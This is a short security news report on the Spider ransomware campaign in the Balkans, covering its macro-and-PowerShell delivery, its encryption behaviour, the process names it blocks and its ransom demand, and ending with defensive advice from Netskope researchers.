PC Users Targeted by Spider Ransomware


Security researchers reported that while analyzing a mid-scale campaign over the weekend, they have found a new ransomware family. The new threat is called Spider ransomware and it uses decoy documents auto-synced to enterprise cloud storage and collaborations applications.

According to the experts, the Spider ransomware is being distributed via an Office document which targets users in Bosnia and Herzegovina, Serbia, and Croatia.

The spam emails look like the sender is going to collect some debt from the recipient, tricking the user into opening the attached file.

However, the obfuscated macro code embedded in the Office document launches a Base64 encrypted PowerShell script instead to download the malicious payload.

Once the system is infected, the ransomware starts encrypting user’s files and adds the ‘.spider’ extension each affected file.

Fortunately, a decrypter was created to display the users interface and let them decrypt the files using a decryption key. It is executed alongside the encrypter, however, it runs in the background until the encryption process has been completed.

According to the Netskope’s expert Amit Malik, the Spider decrypter monitors system processes and prevents the launch of tools like taskmgr, procexp, msconfig, regedit, cmd, outlook, winword, excel, and msaccess.

During the encryption process, the Spider ransomware skips files in the following folders: tmp, Videos, winnt, Application Data, Spider, PrefLogs, Program Files (x86), Program Files, ProgramData, Temp, Recycle, System Volume Information, Boot, and Windows.

When the encryption process is completed, the decrypter displays a warning (available in English and Croatian) to inform users on how to decrypt their files.

Additionally, there is a help section which includes links and references to the resources needed to make the payment which is approximately $120.

“As ransomware continues to evolve, administrators should educate employees about the impact of ransomware and ensure the protection of the organization’s data by making a regular backup of critical data. In addition to disabling macros by default, users must also be cautious of documents that only contain a message to enable macros to view the contents and also not to execute unsigned macros and macros from untrusted sources,” the Netskope researchers state.

Nelly Vladimirova
Nelly Vladimirova has been working as a journalist since 1998 with a main focus on Finance, Economics, and IT. In 2004 she graduated the University of Plovdiv, Bulgaria, as a Bachelor in English Philology and Master in Linguistics and Translation. Later, Nelly received a postgraduate certificate in Business Management from Scott's College, UK. Presently, she is presenting the latest news related to computer security at www.virusguides.com.


Please enter your comment!
Please enter your name here

Time limit is exhausted. Please reload CAPTCHA.